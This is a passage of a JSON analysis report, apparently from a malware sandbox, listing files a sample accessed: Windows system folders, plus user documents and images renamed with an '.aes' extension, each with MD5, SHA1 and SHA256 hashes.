files\\common files", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\filters", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\da-dk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\de-de", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\el-gr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\es-es", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\et-ee", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskmenu", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\he-il", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\it-it", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\nb-no", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\pt-br", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\sl-si", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\sv-se", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\th-th", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\tr-TR", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\uk-UA", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-CN", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\zh-TW", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\msinfo", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\office11", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\1033", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\office11\\1033", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\office12", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\stationery", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\textconv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\textconv\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\triedit", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\Triedit\\en-US", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\triedit\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\VC", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\vc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Microsoft Shared\\VGX", "hashes": [], "norm_filename": "c:\\program files\\common files\\microsoft shared\\vgx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\Services", "hashes": [], "norm_filename": "c:\\program files\\common files\\services", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Common Files\\SpeechEngines", "hashes": [], "norm_filename": "c:\\program files\\common files\\speechengines", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\m-puIO0ZGGG_DdsrzN.docx.aes", "hashes": [ { "md5_hash": "46fd51df427668bd44f09aced2dbd4e3", "sha1_hash": "5682e1fcc43e9c826e4ed8d9b0fd77524199a9b5", "sha256_hash": "ecc14b6db6c57c670ba5ec7e1b264a8fdb456d1db95af731fc95f55c557f1818", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\m-puio0zggg_ddsrzn.docx.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\nfjvj4.docx.aes", "hashes": [ { "md5_hash": "f78b8fe97171f5018267e38507441d19", "sha1_hash": "effdb704a68c020ac042875b931f825b97bb454d", "sha256_hash": "81f9f75421581977317422a81f42d7ade9979c8b0f46d2527efa6ce580f1f5e4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\nfjvj4.docx.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\q7IKH0zTPGa.pptx.aes", "hashes": [ { "md5_hash": "7235e53d262732945d8a375f945a3de7", "sha1_hash": "3c1e6adc09077541eb0cbfe31885489a71dac793", "sha256_hash": "d8b9d66ba32a3af0e5969470b6ba6cbc1a3cd1a989d9195dc3bda420e9dd7c92", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\q7ikh0ztpga.pptx.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\Qis2t0idI.docx.aes", "hashes": [ { "md5_hash": "0e8560282b8c4a6ec1fd5c952c07af99", "sha1_hash": "e6ee918d36b01b33ab0eba405d52a2ed8404181a", "sha256_hash": "12dc712ac4e8c7c64922bc04b611bbecae314082b5281e472a79a4012b1c50c2", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\qis2t0idi.docx.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Documents\\RLtENk6-mjNOz-raUF3v.xlsx.aes", "hashes": [ { "md5_hash": "d5727bec6b966e713f5810a849aa5246", "sha1_hash": "e6ccf79766615031b95fa6905bf9f8c0bb86fedc", "sha256_hash": "f1d72df150d5ff7e642e31206a15bfc858ee681c762ef6e4d9dce8ecca154d44", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\documents\\rltenk6-mjnoz-rauf3v.xlsx.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Internet Explorer", "hashes": [], "norm_filename": "c:\\program files (x86)\\internet explorer", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Internet Explorer\\en-US", "hashes": [], "norm_filename": "c:\\program files (x86)\\internet explorer\\en-us", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", "hashes": [], "norm_filename": "c:\\program files (x86)\\internet explorer\\signup", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java", "hashes": [], "norm_filename": "c:\\program files (x86)\\java", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\client", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\client", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\bin\\plugin2", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Java\\jre7\\lib", "hashes": [], "norm_filename": "c:\\program files (x86)\\java\\jre7\\lib", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj\\-fs-R5u50BfKvf.png.aes", "hashes": [ { "md5_hash": "7bb2e8ec37ac4b620d87678f7be34ef1", "sha1_hash": "5f39bbf26aa189c857a5e9bf707d84daaef58d4b", "sha256_hash": "8d68c18af26ecf7076fb96306ef866b2a408bd4153560d429fcabb5b3f093c23", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\-fs-r5u50bfkvf.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\hGZFj\\Z3txdNfa.bmp.aes", "hashes": [ { "md5_hash": "46d2e6cb7f4ca911091c2f4ee2ecd912", "sha1_hash": "8ec9c05490617cb7dae0588fcc8e1751ffaa9d70", "sha256_hash": "dda2c8e48380ff7b23ff11e5306d6ff216c520274b60a2ab7e8afe37de6d8e67", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\hgzfj\\z3txdnfa.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\3wLGR0fUmkcND1.png.aes", "hashes": [ { "md5_hash": "d710ba1f9a81fbc1c13d7b20df83277a", "sha1_hash": "528b02ff9d2dd4d77fdfd9a700a22c4e096a83f4", "sha256_hash": "1061bd095af27d7fe35f56f3a9365a7d8def1a1b1ce4903df2f842ccfe399e55", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\3wlgr0fumkcnd1.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\8hsXLmZ5FCCheFKC.png.aes", "hashes": [ { "md5_hash": "f4b5452216d5cb0fb9cefaa11f242e58", "sha1_hash": "e7858ee1015a02b10e45e743ffe1d7bda89a2c02", "sha256_hash": "b0f9d4f9a863238e515a3aa7c989f84f2451ff4afd27f8508365a4d1cefbd2dd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\8hsxlmz5fcchefkc.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\TmdCgSua1hPeIxp_g-_\\pR 2s.bmp.aes", "hashes": [ { "md5_hash": "10b2f6540bff351636f42339c1b643a7", "sha1_hash": "982656311181ec70596ba950e6605305c7f7c8d6", "sha256_hash": "b9a4b666e6d46baf75772ae2815a85bdceec9ddff501ca829b2b681ddc97f767", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\tmdcgsua1hpeixp_g-_\\pr 2s.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\2mLpi.gif.aes", "hashes": [ { "md5_hash": "1878f1b773dcedc9cac040f2a2b2b8e6", "sha1_hash": "b55dabf912cd2dee14689e0f5617f9bb3827cbe4", "sha256_hash": "99f9a7d45602b8eb042ff8a2f59ad429261fe9211fd3f3c17e3b165aab8bbc9e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\2mlpi.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\JP-9xm1BMM.gif.aes", "hashes": [ { "md5_hash": "28e7ebc290ab9d66146d876f60719e1a", "sha1_hash": "08cf9655e9fb04f78375b746014526c0adab57d3", "sha256_hash": "04d9f130381e626f3ef5ae2c5d68737dd28021da972605a4c7bb40b1a0ed8171", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\jp-9xm1bmm.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\M8qmIADbo6Rfghx.png.aes", "hashes": [ { "md5_hash": "eacdf76ecf7f4b5e78c0fd29a348cea0", "sha1_hash": "0e48b08dd66df2e11f805f05032cbd61f1ab9877", "sha256_hash": "35435da68e0bfdb82aaa7d6eba4943c6e5fa6967b7e3d772e423ee36667ad96c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\m8qmiadbo6rfghx.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\joDdd\\_g8EG0.gif.aes", "hashes": [ { "md5_hash": "51a99d0f1f32a1c3c6b6752f1f5eb550", "sha1_hash": "326141069ecceb4de8e70b07bc4966c46fdc0702", "sha256_hash": "21557d72e6aa6fb37becd6d62c3805abae79d832cb17a8a9cae077d20a47bde4", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\joddd\\_g8eg0.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\C7FcN8b.bmp.aes", "hashes": [ { "md5_hash": "5e964211411022eaae91419506f2100e", "sha1_hash": "f6e54c903de4c689b8b613558eac73f12f998621", "sha256_hash": "be249b51e66fb01abcba2bb7e138922a931fc802fa00fb298d61b44dd5f956d3", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\c7fcn8b.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\dhn.png.aes", "hashes": [ { "md5_hash": "ca71590f70e963d7a439b1f14c3a3505", "sha1_hash": "0edc2846537f588767d9db0db53afe319e942ea7", "sha256_hash": "f8126bb815fce1b0b91dd2c322f04549d98a9a4447114d4ff9c3ff666833b1cf", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\dhn.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\HLuFP.gif.aes", "hashes": [ { "md5_hash": "ef32330fa9b2e77d0fdd5d55e0cc2d5c", "sha1_hash": "e2d51eca25c2e32a42ccb7c36e2d129b8f84a832", "sha256_hash": "fd4266409feb459b961db3603228b384e1834b7367a5194bc8e4ac27a5b2c165", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hlufp.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\hy7xiC9tP5aFULp5TBa.gif.aes", "hashes": [ { "md5_hash": "13994d4d58262069576841f930dff4ec", "sha1_hash": "2fd6bfad49bd383a0c88348f17d5b81bec3139b9", "sha256_hash": "42d6c418c3d8474d7e5bd46a03792c229b36660c6b06971cf97ab1a4878f7ed6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\hy7xic9tp5afulp5tba.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\ljSzdoYLTSvld u.jpg.aes", "hashes": [ { "md5_hash": "e9682fb13486a4857768244d92a3ff3e", "sha1_hash": "8bbb651b9a9cad681977091dfaa82ea1156c07d2", "sha256_hash": "395b9e631f36c82f3e632fa4bce9f967eef300eeae7cdf94b7437465d7350c3e", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\ljszdoyltsvld u.jpg.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\MEtsfgADG8jkpvQ.gif.aes", "hashes": [ { "md5_hash": "bb0f62a2dfbf26a6d751982c57a9aea1", "sha1_hash": "11860db0c8c140b98330f30f9d8a1d5309e1eab9", "sha256_hash": "408c46f08f5fa0f924de60c284e5f59459d9be5ba5da929af5cbd8afc532beef", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\metsfgadg8jkpvq.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\k-E 1jpgXeyuKG\\QB7s9AH4L3t.png.aes", "hashes": [ { "md5_hash": "0f6849849c005fc01b64c07f1fab5bdd", "sha1_hash": "3196e8a33ecdd91bef97e328dfdd2f6c0ca4b95a", "sha256_hash": "0ef2caf3fd1bd68668edb02a02a268caf59dfa55837c8984b56ec57f32e425c5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\k-e 1jpgxeyukg\\qb7s9ah4l3t.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\btMvVnX CFKn1XV99U44.gif.aes", "hashes": [ { "md5_hash": "fba6c69ee942cac203edc54a01c42d08", "sha1_hash": "dc75277d5caab8a220c0ce943b9472a63f3fdf10", "sha256_hash": "53c62a0c3ecd866e249b6f10fe675b964f382736c2c11431dd6cea61b0f983ed", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\btmvvnx cfkn1xv99u44.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": 